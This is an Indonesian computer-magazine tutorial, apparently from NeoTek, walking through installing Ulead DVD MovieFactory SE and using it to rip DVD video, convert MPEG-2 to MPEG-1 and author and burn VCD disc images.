Instalasi DVD MovieFactory SE berjalan secara otomatis, menghasilkan menu yang memungkinkan anda mengakses proyek konversi anda di tiga pintu masuk: video capture, author menus, dan burn disc images.
ULEAD DVD MOVIEFACTORY SE BERlangsung secara otomatis. Yang perlu anda tetapkan adalah video template, sesuai dengan sistem televisi yang anda gunakan. Untuk Indonesia gunakan sistem PAL. Installer ini juga akan meminta anda menginstal Quick Time 5 apabila pada komputer anda belum terdapat, juga akan memeriksa DirectX yang terinstal. Setelah instalasi selesai, Ulead DVD MovieFactory SE dapat diakses lewat Start Menu maupun icon pada desktop dan akan menampilkan tiga pilihan: Video capture,

I

NSTALASI

Author menu, dan Burn disc images yang sebenarnya merupakan tiga fungsi berurutan dalam proses konversi video sampai mem-burn disc. Dalam hal ini diasumsikan bahwa sistem anda terdiri dari DVD-ROM drive serta CD-RW drive (atau combo drive dari keduanya), yang berarti anda dapat membaca DVD disc serta dapat mem-burn CD-R disc menjadi VCD atau SVCD. Sistem ini memang tidak memungkinkan pengendalian bit-rate secara detail seperti apabila menggunakan DVD2AVI bersama TMPGEnc, tetapi sudah sangat memadai.

1

MENJALANKAN SETUP.EXE
Double click setup.exe dan ikuti perintahnya. Pada saat diminta mengisi Video Templates, pilih OR Select a video standard dan di situ pilih lagi PAL. Klik Next untuk melanjutkan.

2

INSTALASI QUICK TIME 5
Apabila pada komputer anda belum terinstalasi Quick Time 5, maka pilih untuk menginstal software ini. Sewaktu menentukan QuickTime Settings, anda bisa menetapkan video file untuk berasosiasi ke QuickTime, tapi mungkin tidak untuk file grafis Internet.

3

MENJALANKAN DVD MF SE
Double click icon Ulead DVD MovieFactory SE pada desktop dan tampil layar pembuka yang menunjukkan ada 3 fungsi software ini: Capture Video, Author menus, dan Burn disc images. Kita pilih yang pertama terlebih dahulu.

4

CAPTURE IMAGE
Tampilan Capture Image dengan Capture Setting untuk menetapkan meng-capture dari mana dan apakah audio juga perlu dicapture, folder untuk menyimpan hasil capture, serta layar untuk preview hasil capture.

5

AUTHOR MENUS
Pada dasarnya ini adalah proyek untuk membuat disc image untuk kelak di-burn sebagai DVD, VCD, ataupun SVCD disc. Disini anda bisa memilih file-file video yang ingin digabungkan menjadi suatu movie, mem-preview-nya, dan dilanjutkan ke burn image.

6

BURN DISC IMAGES
Selain bisa diakses di akhir author menus, burn disc images juga dapat diakses langsung untuk membentuk image dari proyek yang dibentuk sebelumnya sebagai disc image (untuk DVD, VCD, maupun SVCD) atau mem-burn langsung ke disc.

46

NeoTek Vol. IV No. 04

NeoReview

Konversi DVD Video Menjadi M P EG File
Untuk DVD video yang tidak menggunakan surround sound (seperti misalnya Dolby Digital ataupun DTS), maka DVD MovieFactory SE adalah software tunggal untuk mengkonversi DVD video menjadi VCD video.
NEOTEK PERNAH ADA YANG BERTANYA APAkah ada software tunggal untuk mengkonversi DVD ke VCD dengan hanya klik-klik saja? Sejauh untuk home video DVD (atau DVD video bajakan), jawabannya adalah DVD MovieFactory SE ini. Yang tetap menjadi masalah bukanlah konversi antar format video, melainkan konversi audio yang terdapat pada video tersebut. Pada home video yang diambil dengan video camera ataupun DVD bajakan, format audio yang digunakan adalah mono (satu channel) atau stereo audio (dua channel) dengan berbagai pilihan sampling rate.

P

EMBACA

DVD MovieFactory SE (serta banyak video editing untuk PC lainnya) tidak mendukung digital sound yang memberikan efek surround seperti untuk hi-fi. Ini dikarenakan format Dolby Digital (AC3) atau DTS menggunakan banyak channel. AC3 menggunakan 6 channel untuk memberikan efek surround dan ini tidak didukung oleh kebanyakan video editing kelas pribadi. Untuk DVD disc jenis ini anda harus menggunakan teknik yang dibahas di NeoTek IV/3 dengan ditambah AC3 Decoder untuk mengubah file AC3 yang dihasilkan DVD2AVI menjadi file WAV sebelum dimasukkan ke TMPGEnc.

1

CAPTURE VIDEO
Klik Capture settings dan pilih Capture Options... pastikan Capture audio di-tick. Pada Audio Format anda dapat memilih mutu audio hasil konversi nantinya, apakan CD quality, Radio quality, atau Telephone quality.

2

VIDEO PROPERTIES
Mengklik Video Properties akan membuka jendela untuk memilih sumber video yang ingin dikonversi. Dalam contoh ini adalah DVD video yang ada di disk drive E di bawah direktori VIDEO_TS. Klik OK untuk melanjutkan.

3

CAPTURE VIDEO
Perhatikan icon video di sisi kiri atas (dengan bintik merah). Apabila di-klik akan berganti menjadi kotak biru (artinya sedang membaca chapter atau scene apa saja yang ada.

4

BEBERAPA CHAPTER YANG ADA
Tampak pada contoh ada 10 chapter dengan panjang masing-masing terlihat di sebelah kanannya. Klik chapter pertama dan akan ditandai dengan kotak biru. Perhatikan property Video: MPEG-2, serta Audio: Dolby AC-3 Audio (Kita sudah duga akan ada masalah).

5

RIPPING MPEG-2
Klik Finish dan proses ripping akan berlangsung, yaitu memindahkan file MPEG-2 dari DVD disc ke hard disk. Karena tidak ada rendering ulang (tetap dalam format DVD), maka proses ini berlangsung cepat.

6

PINDAH KE TAB EDIT
Kita akan dibawa ke tab Edit dengan hasil ripping kita. File dengan format MPEG-2 ini sudah bisa di-playback menggunakan Media Player ataupun RealOne (audionya masih dikenali dengan baik) apabila anda tidak berminat mengkonversinya lebih lanjut.

Vol. IV No. 04 NeoTek

47

NeoReview

7

CLIP PROPERTIES
Klik Clip Properties dan baru terlihat masalahnya. Walaupun clip ini berisi audio, tetapi audio ini tidak dikenali oleh DVD MovieFactory SE (serupa dengan masalah pada TNPGEnc dalam bahasan bulan lalu). Kalau diteruskan video kita akan bisu.

8

BATCH CONVERT
DVD MovieFactory SE ini hanya untuk home video, tetapi untuk sekedar contoh kita teruskan ke Batch Convert. Disini anda bisa memilih mau mengkonversinya ke DVD, VCD, atau SVCD (disc) atau AVI, MPEG-1, MPEG-2, WMV (file), atau DVD-VR (VCR).

9

SAVE SEBAGAI MPEG-1
Misalnya kita memilih mengubah file MPEG-2 itu (dari DVD) menjadi file MPEG-1 (untuk VCD). Anda akan diminta memberi nama terhadap file yang akan di-save.

10

PROSES KONVERSI
Proses konversi mencakup rendering ulang dalam mengubah format MPEG-2 menjadi MPEG-1. Proses ini akan berjalan cukup lama, tergantung pada kecepatan prosesor dan memori komputer anda.

11

MPEG-1 TERBENTUK
Terlihat bahwa dari file MPEG-2 dengan ukuran 250 Mbyte terbentuk file MPEG-1 dengan ukuran 100 Mbyte. Klip sumber maupun hasil akan ditempatkan pada antrian yang sama dan dapat anda preview ataupun remove (hilangkan dari antrian).

12

EXPORT
Selanjutnya file hasil konversi dapat diekspor untuk menjadi image file DVD, SVCD, atau VCD; di-copy balik ke Camcoder (DV recording, baik MiniDV maupun DVD-RAM); di-embed ke HTML atau DirectX (Web Page); E-mail; Greeting card; maupun ke DVD-VR.

1

AUTHOR MENUS
Apabila memilih Author menus anda akan dihadapkan pada jendela dialog pembentukan proyek untuk membuat DVD, VCD, ataupun SVCD disc. Load file MPEG-2 (DVD) atau MPEG-1 (VCD) tergantung pada proyek yang dipilih

2

PROPERTIES VIDEO FILE
Apabila anda memilih proyek VCD sedangkan mutu video MPEG-1 melebihi mutu VCD, mungkin anda akan diminta untuk membentuk XVCD.

3

PREVIEW
Anda dapat mempreview satu clip yang baru anda pilih ini dan bila sudah memuaskan, klik Next untuk melanjutkan.

48

NeoTek Vol. IV No. 04

NeoReview

Burn File M PG Menjadi VCD
Dengan DVD MovieFactory SE anda dapat juga melakukan proses disc burning maupun membentuk CD image file, tanpa perlu menggunakan software khusus untuk CD burning seperti misalnya Nero Burning ROM. Semuanya dalam satu software!

4

PREVIEW KESELURUHAN
Misalkan anda sudah mengurutkan beberapa video clip dan selanjutnya anda dapat melihat preview secara keseluruhan. Klik Next untuk melanjutkan.

5

BURN IMAGE
Anda akan dibawa ke jendela dialog Burn disc image. Di sini anda bisa memilih untuk memburn terlebih dahulu ke disc file image ataupun langsung ke CD writer (untuk VCD) ataupun ke DVD writer (untuk DVD atau SVCD).

6

FILE IMAGE
Apabila dibuat VCD disc file image akan terbentuk file vcd_xa.ixa yang kemudian dapat digunakan untuk mem-burn ke CD-R membentuk VCD disc.

Iklan visionnet

Sign up to vote on this title
UsefulNot useful